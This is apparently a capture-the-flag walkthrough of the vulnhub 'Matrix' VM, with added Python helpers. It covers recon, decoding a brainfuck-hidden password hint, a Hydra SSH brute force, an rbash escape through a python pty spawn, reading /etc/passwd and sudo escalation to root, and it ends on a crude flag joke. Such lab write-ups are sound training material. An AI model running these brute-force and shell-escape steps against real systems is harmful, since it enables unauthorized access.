2019/01/26:

A new VM from vulnhub.com:

The link:

ariokio@GB-BXBT-1900:~/Documents/VM/vulnhub$ wget https://download.vulnhub.com/matrix/Machine_Matrix.zip

=============

First, a recon of the network with my script:

root@aridebsec:~/Documents# ./all_live_hosts.sh 10.0.1.0/24

xx-xxx-2 (10.0.1.1)

attacker (10.0.1.41)

porteus (10.0.1.72): the victim?

=============

An nmap scan to identify the machine's ports and services:

# Nmap 7.70 scan initiated Sat Jan 26 18:23:48 2019 as: nmap -sC -sV -A -oA Matrix_nmap 10.0.1.72

Nmap scan report for porteus (10.0.1.72)

Host is up (0.0022s latency).

Not shown: 997 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.7 (protocol 2.0)

| ssh-hostkey:

| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)

| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)

|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)

80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)

|_http-server-header: SimpleHTTP/0.6 Python/2.7.14

|_http-title: Welcome in Matrix

31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)

|_http-server-header: SimpleHTTP/0.6 Python/2.7.14

|_http-title: Welcome in Matrix

MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 2.16 ms porteus (10.0.1.72)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Jan 26 18:24:24 2019 -- 1 IP address (1 host up) scanned in 37.18 seconds

So we have ports 22, 80 and 31337; the last one (like port 80) is a Python SimpleHTTPServer instance, i.e. someone just started `python -m SimpleHTTPServer` in some directory... It looks like...

Let's look at port 80 and port 31337 in a browser.

Port 80 serves a site with a counter, but the counter doesn't run. Nothing of interest in the source.

A slightly different page on port 31337: this time the source contains:

Cypher

"You know.. I know this steak doesn't exist. I know when I put it in my mouth; the Matrix is telling my brain that it is juicy, and delicious. After nine years.. you know what I realize? Ignorance is bliss."

</div>

</div>

<!-- service -->

<!-- End / service -->

Well, well:

a quick base64 decode (nothing ventured, nothing gained):

root@aridebsec:~/Documents/Matrix_vulnhub# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

OK, but what does that mean????? After a few minutes' thought: what if we put that file name in the URL, i.e. ask the server on 31337 for http://10.0.1.72:31337/Cypher.matrix... 😉

That downloads a file... Cool, let's go...

root@aridebsec:~/Documents/Matrix_vulnhub# file Cypher.matrix

Cypher.matrix: ASCII text

root@aridebsec:~/Documents/Matrix_vulnhub# stat Cypher.matrix

File: Cypher.matrix

Size: 4121 Blocks: 16 IO Block: 4096 regular file

Device: 801h/2049d Inode: 2228603 Links: 1

Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)

Access: 2019-01-26 18:52:33.341345750 -0500

Modify: 2019-01-26 18:51:31.485346015 -0500

Change: 2019-01-26 18:51:46.401345951 -0500

Birth: -

Nothing special, it's a plain ASCII file.

Opening it, we find a brainfuck program (excerpt):

+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<

]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++

.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----

.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[

->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.

<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++

+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>

----- ---.- --.<

We go to the site: https://www.dcode.fr/brainfuck-language

which translates the code into:

You can enter into matrix as guest, with password k1ll0rXX

Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
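Rather than pasting a file from a target into a third-party site, a brainfuck interpreter is about forty lines. The one below is an added example and is not part of the original write-up or of the VM; the sample program it ships with is a constructed one that prints "Hi" (the excerpt above is incomplete, so the full Cypher.matrix has to be passed on the command line to decode the real message). Whitespace and the 5-character grouping are ignored, exactly as dcode.fr does.

```python
"""Minimal brainfuck interpreter, so a Cypher.matrix-style payload can be
decoded offline instead of being pasted into dcode.fr.

Added example, not code from the original write-up.  SAMPLE_PROGRAM is a
constructed program that prints "Hi"; run with a file argument to decode
the real Cypher.matrix.
"""
import sys


def run_brainfuck(program: str, input_bytes: bytes = b"", tape_size: int = 30000) -> str:
    """Execute `program` and return everything it writes to stdout as text.

    Any character that is not one of the eight commands is skipped, which is
    why the 5-character groups and newlines in Cypher.matrix do not matter.
    Cells are unsigned bytes that wrap around, as in the common implementations.
    """
    code = [c for c in program if c in "<>+-.,[]"]

    # Pre-compute matching brackets so loops are O(1) jumps and unbalanced
    # input is rejected up front rather than looping forever.
    jump = {}
    stack = []
    for pos, c in enumerate(code):
        if c == "[":
            stack.append(pos)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {pos}")
            start = stack.pop()
            jump[start] = pos
            jump[pos] = start
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = in_pos = 0
    out = bytearray()
    while pc < len(code):
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif c == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            # On EOF the cell is left unchanged (one of the usual conventions).
            if in_pos < len(input_bytes):
                tape[ptr] = input_bytes[in_pos]
                in_pos += 1
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


# Constructed sample: 8 * 9 = 72 -> 'H', then 33 more -> 105 -> 'i'.
# Written in 5-character groups with whitespace, like Cypher.matrix, to show
# that the grouping is purely cosmetic.
SAMPLE_PROGRAM = "+++++ +++[> +++++ ++++< -]>." + "+" * 33 + "."


if __name__ == "__main__":
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PROGRAM
    print(run_brainfuck(src))
```

Usage: `python3 bf.py Cypher.matrix` prints the hidden message; with no argument it runs the sample and prints `Hi`.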

OK, so we have SSH, HTTP, and a port 31337 that hands us a file which, once downloaded and decoded, gives us

a user "guest" and part of a password... Well well... As the text says, the last two characters of the password are missing.

We build a candidate dictionary by filling in those two characters with crunch (already used in the MrRobot

machine challenge). In crunch's -t syntax `%` is a digit and `@` a lowercase letter, so this mask only covers 10 x 26 = 260 endings; if the real ending were uppercase or a symbol, a wider charset would be needed:

root@aridebsec:~/Documents/Matrix_vulnhub# crunch 8 8 -t k1ll0r%@ -o dict.txt

Crunch will now generate the following amount of data: 2340 bytes

0 MB

0 GB

0 TB

0 PB

Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
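The same mask expansion in a few lines of Python, as an added example that is not part of the original write-up: it reproduces crunch's 260 candidates and 2340 bytes for the `k1ll0r%@` mask, and shows the cost of the wider search (any two printable characters) that would have been needed had the mask guess been wrong. The `PRINTABLE` charset and the function names are this script's own choices, not crunch options.

```python
"""Expand a crunch-style password mask into a wordlist, as an alternative to
`crunch 8 8 -t k1ll0r%@ -o dict.txt`, and measure what the mask leaves out.

Added example, not part of the original write-up.  The k1ll0rXX prefix and
the %@ mask come from the write-up; PRINTABLE and the function names are this
script's own.
"""
import itertools
import string

# Placeholder classes mirroring crunch's -t syntax: @ lowercase, , uppercase,
# % digit, ^ symbol.  Any other character in the mask is kept literally.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}

# Every printable ASCII character except whitespace: 26 + 26 + 10 + 32 = 94.
PRINTABLE = string.ascii_letters + string.digits + string.punctuation


def expand_mask(mask, classes=CRUNCH_CLASSES):
    """Return every candidate matching `mask`, rightmost slot varying fastest."""
    slots = [classes.get(ch, ch) for ch in mask]
    return ["".join(parts) for parts in itertools.product(*slots)]


def wordlist_bytes(words):
    """Size of the wordlist on disk (one word per line), as crunch reports it."""
    return sum(len(w.encode()) + 1 for w in words)


def write_wordlist(path, words):
    """Write one candidate per line and return the number of bytes written."""
    data = "".join(w + "\n" for w in words).encode()
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    narrow = expand_mask("k1ll0r%@")                  # digit then lowercase, as in the write-up
    wide = expand_mask("k1ll0r**", {"*": PRINTABLE})  # any two printable characters
    print(f"%@ mask: {len(narrow)} candidates, {wordlist_bytes(narrow)} bytes")
    print(f"two printables: {len(wide)} candidates, {wordlist_bytes(wide)} bytes")
    write_wordlist("dict.txt", narrow)
```

The narrow list is 260 lines; the wide one is 94 x 94 = 8836, still small enough to throw at SSH, so when the text only says "two characters" there is little reason to gamble on digit-plus-lowercase.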

Then, since HTTP gives nothing more, we move to port 22 and try our luck. Hydra's warning about -t 4 below is worth heeding against a real sshd: its MaxStartups setting (default 10:30:100) starts randomly dropping unauthenticated connections once ten are pending, so 16 parallel tasks can silently miss candidates:

root@aridebsec:~/Documents/Matrix_vulnhub# hydra -l guest -P dict.txt 10.0.1.72 ssh

Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-01-26 19:12:06

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task

[DATA] attacking ssh://10.0.1.72:22/

[STATUS] 180.00 tries/min, 180 tries in 00:01h, 84 to do in 00:01h, 16 active

[22][ssh] host: 10.0.1.72 login: guest password: k1ll0r7n

1 of 1 target successfully completed, 1 valid password found

[WARNING] Writing restore file because 3 final worker threads did not complete until end.

[ERROR] 3 targets did not resolve or could not be connected

[ERROR] 16 targets did not complete

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-01-26 19:13:14

root@aridebsec:~/Documents/Matrix_vulnhub#

So we have a user and a password:

guest : k1ll0r7n

SSH connection to the victim:

root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72

The authenticity of host '10.0.1.72 (10.0.1.72)' can't be established.

ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '10.0.1.72' (ECDSA) to the list of known hosts.

guest@10.0.1.72's password:

Last login: Mon Aug 6 16:25:44 2018 from 192.168.56.102

guest@porteus:~$ ls

-rbash: /bin/ls: restricted: cannot specify `/' in command names

guest@porteus:~$ ls -l

-rbash: /bin/ls: restricted: cannot specify `/' in command names

guest@porteus:~$ ll

-rbash: /bin/ls: restricted: cannot specify `/' in command names

guest@porteus:~$ cd

-rbash: cd: restricted

guest@porteus:~$ ls

-rbash: /bin/ls: restricted: cannot specify `/' in command names

guest@porteus:~$

OK, OK...

Hitting Tab:

guest@porteus:~$

! bg command dirs enable fc help let mcedit readonly suspend type vi

./ bind compgen disown esac fg history ll popd return test typeset wait

: break complete do eval fi if local printf select then ulimit while

[ builtin compopt done exec for in logout pushd set time umask {

[[ caller continue echo exit function jobs ls pwd shift times unalias }

]] case coproc elif export getopts kill mapfile read shopt trap unset

alias cd declare else false hash la mc readarray source true until

guest@porteus:~$ echo $PATH

/home/guest/prog

guest@porteus:~$ echo /home/guest/prog/*

/home/guest/prog/vi

guest@porteus:~$ echo $SHELL

/bin/rbash

guest@porteus:~$

What the fuck is with this restricted shell....

Thanks Gotmilk, this is the classic restricted-shell escape: run the payload through ssh's command argument instead of the interactive shell. Why it works: rbash only inspects the command words it parses itself, so `/bin/bash` passed as a string argument to python never trips the "cannot specify `/`" rule, and the bash that python spawns inherits none of the restrictions. The non-interactive shell that runs an ssh command string also evidently did not get the PATH lock-down seen interactively (it found `python`, which /home/guest/prog does not contain):

root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/bash\")'"

guest@10.0.1.72’s password:

guest@porteus:~$ cat /etc/passwd

cat /etc/passwd

root:x:0:0::/root:/bin/bash

bin:x:1:1:bin:/bin:/bin/false

daemon:x:2:2:daemon:/sbin:/bin/false

adm:x:3:4:adm:/var/log:/bin/false

lp:x:4:7:lp:/var/spool/lpd:/bin/false

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/:/bin/false

news:x:9:13:news:/usr/lib/news:/bin/false

uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false

operator:x:11:0:operator:/root:/bin/bash

games:x:12:100:games:/usr/games:/bin/false

ftp:x:14:50::/home/ftp:/bin/false

smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false

mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false

rpc:x:32:32:RPC portmap user:/:/bin/false

sshd:x:33:33:sshd:/:/bin/false

gdm:x:42:42:GDM:/var/lib/gdm:/sbin/nologin

oprofile:x:51:51:oprofile:/:/bin/false

usbmux:x:52:83:User for usbmux daemon:/var/empty:/bin/false

sddm:x:64:64:User for SDDM:/var/empty:/bin/false

pulse:x:65:65:User for PulseAudio:/var/run/pulse:/bin/false

apache:x:80:80:User for Apache:/srv/httpd:/bin/false

messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false

haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false

pop:x:90:90:POP:/:/bin/false

nobody:x:99:99:nobody:/:/bin/false

guest:x:1000:100:,,,:/home/guest:/bin/rbash

vboxadd:x:999:1::/var/run/vboxadd:/bin/false

colord:x:72:72:Color Daemon Owner:/var/lib/colord:/bin/false

polkitd:x:28:28:PolicyKit Daemon Owner:/etc/polkit-1:/bin/false

trinity:x:1001:1001::/home/trinity:/bin/bash

guest@porteus:~$ sudo -l

sudo -l

User guest may run the following commands on porteus:

(ALL) ALL

(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper

(trinity) NOPASSWD: /bin/cp

`(ALL) ALL` means guest may run any command as any user, as long as it gives its own password, so the two NOPASSWD entries (the xfce shutdown helper, and cp as trinity) are not even needed. The first two attempts below use a wrong password; the odd lines that come back are sudo's "insults" (Goon Show quotes, printed after a failed attempt when sudo is built with insults enabled), and the third attempt uses guest's own password:

guest@porteus:~$ sudo /bin/bash

sudo /bin/bash

Password:

There’s a lot of it about, you know.

Password:

Ying Tong Iddle I Po

Password: k1ll0r7n

root@porteus:/home/guest#

root@porteus:/home/guest# id

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

root@porteus:/home/guest#

Game over!!!!! I'm root

root@porteus:/home/guest# ls

ls

Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ prog/

root@porteus:/home/guest# cd

cd

root@porteus:~# ls

ls

Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt

root@porteus:~# cat flag.txt

cat flag.txt

_,-.

,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE

|_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE

|`-._\`.__ `_. IN THE MATRIX AND BEAT OFF

|`-._`-.\,-'_| _,-'.

`-.|.-' | |`.-'|_ WHAT

| |_|,-'_`.

|-._,-' | NO, ME NEITHER

jrei | | _,'

'-|_,-' IT'S JUST A HYPOTHETICAL QUESTION